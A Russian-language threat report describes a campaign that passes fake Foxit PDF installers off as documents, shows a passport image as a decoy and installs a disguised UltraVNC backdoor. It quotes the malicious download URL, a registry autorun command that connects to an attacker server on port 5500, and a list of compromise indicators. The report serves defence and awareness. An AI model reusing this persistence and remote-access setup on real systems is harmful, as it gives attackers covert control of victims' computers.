Более 650 миллионов пользователей доверяют Foxit как лёгкой и быстрой программе для чтения PDF-документов. Именно эта репутация делает популярное программное обеспечение привлекательной мишенью для злоумышленников. Чем привычнее приложение, тем легче убедить человека, что скачиваемый файл безопасен. Вместо того чтобы искать уязвимости в самом Foxit, атакующие идут более простым путём: они выдают себя за разработчика. Поддельный установщик, внешне неотличимый от настоящего, доставляет в систему инструменты удалённого управления, похищает учётные данные или обеспечивает долговременное закрепление в сети.
Описание
Такой подход уже не раз применялся в прошлом. В 2024 году несколько кампаний использовали троянизированные установщики и отравление результатов поиска для массового распространения фальшивых PDF-редакторов. Никаких эксплойтов - только доверие пользователя. В свежем инциденте, который зафиксировали специалисты G DATA, схема была доработана и дополнена элементами социальной инженерии.
Злоумышленники распространяют исполняемые файлы, названия которых имитируют обычные документы. Среди обнаруженных образцов фигурируют Datei.exe, 1.exe и Document09.10.2025.exe. Ни один из них не соответствует официальным именам установщиков Foxit. Пользователь, ожидающий открыть документ, легко пропускает это несоответствие - на это и делается ставка. Когда жертва запускает такой файл, на экране на долю секунды появляется изображение чьего-то паспорта (в данном случае датского). Эта картинка служит отвлекающим манёвром: человек думает, что открыл документ, а в это время в фоне выполняется вредоносный код.
После запуска Datei.exe загружает MSI-пакет с адреса hxxps://juneuk25[.]cfd/personalfoxypdf.msi. Пакет стилизован под компонент Foxit, что должно укрепить доверие. Однако его поведение не соответствует нормальному процессу установки: отсутствуют стандартные диалоговые окна и подтверждения. Вместо этого файл сразу разворачивает компоненты в неожиданный каталог - C:\intel-GPU\. Именно там и скрывается основная угроза.
Под видом файлов, связанных с графическим драйвером, атакующий прячет популярный инструмент удалённого доступа UltraVNC. Этот инструмент позволяет полностью контролировать рабочий стол, клавиатуру и мышь жертвы, а также копировать файлы и выполнять другие команды. Рассмотрим состав скрытого набора. В папке оказывается несколько скриптов и исполняемых файлов. Файл gpu.txt содержит пакетный скрипт Windows, который добавляет исключения в брандмауэр для gpu.exe и запускает его с параметрами автоматического переподключения к серверу hallonews.servemp3.com:5500. IDD.txt хранит локально сгенерированный уникальный идентификатор заражённой системы. SilentRun.vbs запускает gpu.cmd через WScript. В файле UltraVNC.ini прописаны предварительно настроенные параметры VNC-сервера: пароль, порты и разрешённые подключения.
Главный скрипт gpu.cmd генерирует числовой идентификатор, записывает его в IDD.txt, открывает изображение паспорта как приманку, а затем создаёт запись в автозагрузке реестра (HKCU\Software\Microsoft\Windows\CurrentVersion\Run). Команда в реестре выглядит так: "EbiClient - C:\intel-GPU\gpu.exe -multi -autoreconnect ID:%numc% -connect hallonews.servemp3.com:5500". Скрипт также выполняет дополнительные инструкции из gpu.txt и принудительно завершает процесс rundll32.exe. Фактически gpu.cmd обеспечивает закрепление в системе и запуск клиента удалённого доступа.
Сам исполняемый файл gpu.exe - это ядро VNC-клиента. После его активации злоумышленник получает полный доступ к рабочему столу, может перехватывать ввод, выгружать данные, устанавливать дополнительные вредоносные программы и следить за активностью в реальном времени - и всё это незаметно для пользователя.
Телеметрия из VirusTotal показывает, что образцы вредоносного ПО были загружены из Германии, США, Великобритании и Украины. Это говорит о широком, а не географически ограниченном распространении кампании.
Сам по себе приём не нов, но он остаётся действенным. Злоумышленники эксплуатируют не технические уязвимости, а привычки и ожидания людей. Пользователи доверяют знакомым брендам и воспринимают исполняемый файл как обычный документ. Сочетание подделки бренда и маскировки под документ - повторяющийся паттерн современных угроз. Успех такой атаки зависит не от сложности кода, а от совпадения с поведением пользователя. Специалистам по информационной безопасности стоит учитывать этот вектор при построении защиты: важно не только закрывать технические бреши, но и обучать персонал внимательно проверять происхождение файлов, особенно если они не соответствуют официальным названиям установщиков.
Индикаторы компрометации
Domain Port Combinations
- hallonews.servemp3.com:5500
URLs
- https://juneuk25.cfd/personalfoxypdf.msi
SHA256
- 08b9cbdae903faf88b8027a12eee29265ff9b192b63aaa371d3d095b8ec00de5
- 37c5723aeb725b1aec98da1f776fd841176c687d8ad5c2a14a6ebd831f1615d1
- 87e168467d409be8c3aa8e67d3bc90a10b9769e2f63a0e1bad6b906bfd87ef61
- b7dbab109e5bf3afffba5571366602154f3ea37053ec210dd3e030d0fcb2dbaa
- bba4e6028ffa239375d7778b2b5b138b52af0d6a2cfdc99dbadab53373a570f5
